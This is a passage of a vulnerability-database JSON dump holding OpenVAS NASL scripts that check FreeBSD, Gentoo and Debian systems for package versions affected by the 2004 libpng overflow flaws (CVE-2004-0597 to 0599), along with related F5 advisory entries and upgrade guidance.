2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n ImageMagick\n ImageMagick-nox11\n\nCVE-2004-0597\nMultiple buffer overflows in libpng 1.2.5 and earlier, as used in\nmultiple products, allow remote attackers to execute arbitrary code\nvia malformed PNG images in which (1) the png_handle_tRNS function\ndoes not properly validate the length of transparency chunk (tRNS)\ndata, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do\nnot perform sufficient bounds checking.\n\nCVE-2004-0598\nThe png_handle_iCCP function in libpng 1.2.5 and earlier allows\nremote attackers to cause a denial of service (application crash)\nvia a certain PNG image that triggers a null dereference.\n\nCVE-2004-0599\nMultiple integer overflows in the (1) png_read_png in pngread.c\nor (2) png_handle_sPLT functions in pngrutil.c or (3) progressive\ndisplay image reading capability in libpng 1.2.5 and earlier allow\nremote attackers to cause a denial of service (application crash)\nvia a malformed PNG image.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware 
upgrades.\n\nhttp://studio.imagemagick.org/pipermail/magick-users/2004-August/013218.html\nhttp://freshmeat.net/releases/169228\nhttp://secunia.com/advisories/12236\nhttp://www.freebsd.org/ports/portaudit/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html\nhttp://www.vuxml.org/freebsd/a713c0f9-ec54-11d8-9440-000347a4fa7d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52430);\n script_version(\"$Revision: 4118 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-20 07:32:38 +0200 (Tue, 20 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: ImageMagick, ImageMagick-nox11\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ImageMagick\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.4.2\")<0) {\n txt += 'Package ImageMagick version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ImageMagick-nox11\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.4.2\")<0) {\n txt += 'Package ImageMagick-nox11 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-28T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52422", "href": "http://plugins.openvas.org/nasl.php?oid=52422", "type": "openvas", "title": "FreeBSD Ports: png", "sourceData": "#\n#VID f9e3e60b-e650-11d8-9b0a-000347a4fa7d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n png\n linux-png\n firefox\n thunderbird\n linux-mozilla\n linux-mozilla-devel\n mozilla\n mozilla-gtk1\n netscape-communicator\n netscape-navigator\n linux-netscape-communicator\n linux-netscape-navigator\n ko-netscape-navigator-linux\n ko-netscape-communicator-linux\n ja-netscape-communicator-linux\n ja-netscape-navigator-linux\n netscape7\n ja-netscape7\n pt_BR-netscape7\n fr-netscape7\n de-netscape7\n\nCVE-2004-0597\nMultiple buffer overflows in libpng 1.2.5 and earlier, as used in\nmultiple products, allow remote attackers to execute arbitrary code\nvia malformed PNG images in which (1) the png_handle_tRNS function\ndoes not properly validate the length of transparency chunk (tRNS)\ndata, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do\nnot perform sufficient bounds checking.\n\nCVE-2004-0598\nThe png_handle_iCCP function in libpng 1.2.5 and earlier allows remote\nattackers to cause a denial of service (application crash) via a\ncertain PNG image that triggers a null dereference.\n\nCVE-2004-0599\nMultiple integer overflows in the (1) png_read_png in pngread.c or 
(2)\npng_handle_sPLT functions in pngrutil.c or (3) progressive display\nimage reading capability in libpng 1.2.5 and earlier allow remote\nattackers to cause a denial of service (application crash) via a\nmalformed PNG image.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52422);\n script_version(\"$Revision: 4164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-28 09:03:16 +0200 (Wed, 28 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: png\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://scary.beasts.org/security/CESA-2004-001.txt\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/12219\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/12232\");\n script_xref(name : \"URL\" , value : \"http://bugzilla.mozilla.org/show_bug.cgi?id=251381\");\n script_xref(name : \"URL\" , value : \"http://dl.sourceforge.net/sourceforge/libpng/ADVISORY.txt\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/370853\");\n script_xref(name : \"URL\" , value : \"http://www.vuxml.org/freebsd/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"png\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.2.5_7\")<=0) {\n txt += 'Package png version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-png\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.14_3\")<=0) {\n txt += 'Package linux-png version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.2\")>=0 && revcomp(a:bver, b:\"1.2.2\")<=0) {\n txt += 'Package linux-png version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.9.3\")<0) {\n txt += 'Package firefox 
version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.7.3\")<0) {\n txt += 'Package thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2\")<0) {\n txt += 'Package linux-mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2\")<0) {\n txt += 'Package linux-mozilla-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2,2\")<0) {\n txt += 'Package mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.a,2\")>=0 && revcomp(a:bver, b:\"1.8.a2,2\")<=0) {\n txt += 'Package mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-gtk1\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2\")<0) {\n txt += 'Package mozilla-gtk1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"netscape-communicator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.78\")<=0) {\n txt += 'Package netscape-communicator version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"netscape-navigator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.78\")<=0) {\n txt += 'Package netscape-navigator version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-netscape-communicator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package linux-netscape-communicator version ' + bver + ' is 
installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-netscape-navigator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package linux-netscape-navigator version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ko-netscape-navigator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ko-netscape-navigator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ko-netscape-communicator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ko-netscape-communicator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-netscape-communicator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ja-netscape-communicator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-netscape-navigator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ja-netscape-navigator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.1\")<=0) {\n txt += 'Package netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.1\")<=0) {\n txt += 'Package ja-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"pt_BR-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.02\")<=0) {\n txt += 'Package pt_BR-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"fr-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.02\")<=0) 
{\n txt += 'Package fr-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"de-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.02\")<=0) {\n txt += 'Package de-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0758", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0763"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200408-22.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54652", "href": "http://plugins.openvas.org/nasl.php?oid=54652", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200408-22 (mozilla)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New releases of Mozilla, Epiphany, Galeon, Mozilla Thunderbird, and Mozilla\nFirefox fix several vulnerabilities, including remote DoS and buffer\noverflows.\";\ntag_solution = \"All users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv your-version\n # emerge your-version\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200408-22\nhttp://bugs.gentoo.org/show_bug.cgi?id=57380\nhttp://bugs.gentoo.org/show_bug.cgi?id=59419\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200408-22.\";\n\n \n\nif(description)\n{\n script_id(54652);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0763\", \"CVE-2004-0758\", \"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200408-22 (mozilla)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/mozilla\", unaffected: make_list(\"ge 1.7.2\"), vulnerable: make_list(\"lt 1.7.2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/mozilla-firefox\", unaffected: make_list(\"ge 0.9.3\"), vulnerable: make_list(\"lt 0.9.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"mail-client/mozilla-thunderbird\", unaffected: make_list(\"ge 0.7.3\"), vulnerable: make_list(\"lt 0.7.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/mozilla-bin\", unaffected: make_list(\"ge 1.7.2\"), vulnerable: make_list(\"lt 1.7.2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/mozilla-firefox-bin\", unaffected: make_list(\"ge 0.9.3\"), vulnerable: make_list(\"lt 0.9.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"mail-client/mozilla-thunderbird-bin\", unaffected: make_list(\"ge 0.7.3\"), vulnerable: make_list(\"lt 0.7.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/epiphany\", unaffected: make_list(\"ge 1.2.7-r1\"), vulnerable: make_list(\"lt 1.2.7-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/galeon\", unaffected: make_list(\"ge 1.3.17\"), vulnerable: make_list(\"lt 1.3.17\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not 
vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1363", "CVE-2004-0768", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update to libpng\nannounced via advisory DSA 536-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53226", "href": "http://plugins.openvas.org/nasl.php?oid=53226", "type": "openvas", "title": "Debian Security Advisory DSA 536-1 (libpng)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_536_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 536-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Chris Evans discovered several vulnerabilities in libpng:\n\nCVE-2004-0597 - Multiple buffer overflows exist, including when\nhandling transparency chunk data, which could be exploited to cause\narbitrary code to be executed when a specially crafted PNG image is\nprocessed\n\nCVE-2004-0598 - Multiple NULL pointer dereferences in\npng_handle_iCPP() and elsewhere could be exploited to cause an\napplication to crash when a specially crafted PNG image is processed\n\nCVE-2004-0599 - Multiple integer overflows in png_handle_sPLT(),\npng_read_png() nctions and elsewhere could be exploited to cause an\napplication to crash, or potentially arbitrary code to be executed,\nwhen a specially crafted PNG image is processed\n\nIn addition, a bug related to CVE-2002-1363 was fixed:\n\nCVE-2004-0768 - A buffer overflow could be caused by incorrect\ncalculation of buffer offsets, possibly leading to the execution of\narbitrary code\n\nFor the current stable distribution (woody), these problems have been\nfixed in libpng3 version 1.2.1-1.1.woody.7 and libpng version\n1.0.12-3.woody.7.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you update your libpng and libpng3 packages.\";\ntag_summary = \"The remote host is missing an update to libpng\nannounced via advisory DSA 536-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20536-1\";\n\nif(description)\n{\n script_id(53226);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 
22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\", \"CVE-2004-0768\", \"CVE-2002-1363\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 536-1 (libpng)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpng2\", ver:\"1.0.12-3.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng2-dev\", ver:\"1.0.12-3.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng-dev\", ver:\"1.2.1-1.1.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng3\", ver:\"1.2.1-1.1.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599"], "description": "The remote host is missing an update to libpng3\nannounced via advisory DSA 571-1.", "modified": "2017-07-07T00:00:00", "published": 
"2008-01-17T00:00:00", "id": "OPENVAS:53262", "href": "http://plugins.openvas.org/nasl.php?oid=53262", "type": "openvas", "title": "Debian Security Advisory DSA 571-1 (libpng3)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_571_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 571-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several integer overflows have been discovered by its upstream\ndevelopers in libpng, a commonly used library to display PNG graphics.\nThey could be exploited to cause arbitrary code to be executed when a\nspecially crafted PNG image is processed.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.2.1-1.1.woody.9.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.2.5.0-9.\n\nWe recommend that you upgrade your libpng3 packages.\";\ntag_summary = \"The remote host is missing an update to libpng3\nannounced via advisory DSA 571-1.\";\n\ntag_solution = 
\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20571-1\";\n\nif(description)\n{\n script_id(53262);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 571-1 (libpng3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpng-dev\", ver:\"1.2.1-1.1.woody.9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng3\", ver:\"1.2.1-1.1.woody.9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "f5": [{"lastseen": "2020-04-06T22:39:33", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "", "edition": 1, "modified": "2018-07-03T23:33:00", "published": "2007-05-17T04:00:00", "id": "F5:K4009", 
"href": "https://support.f5.com/csp/article/K4009", "title": "Vulnerabilities in libpng - CAN-2004-0597, CAN-2004-0598, CAN-2004-0599", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-11-09T00:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "edition": 1, "description": "These vulnerabilities are described as methods under which an attacker could generate a **PNG** file that would cause applications that use **libpng** to execute arbitrary code. Since an attacker would require **root** access to the BIG-IP or 3-DNS in order to exploit this vulnerability, it is considered to be a minor risk.\n\nF5 Product Development tracked this issue as CR39078, and it was fixed in BIG-IP version 4.5.11 and 4.6.3, in which the version of **libpng** was upgraded to version 1.2.5.\n", "modified": "2011-02-03T00:00:00", "published": "2007-05-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/4000/000/sol4009.html", "id": "SOL4009", "title": "SOL4009 - Vulnerabilities in libpng - CAN-2004-0597, CAN-2004-0598, CAN-2004-0599", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": 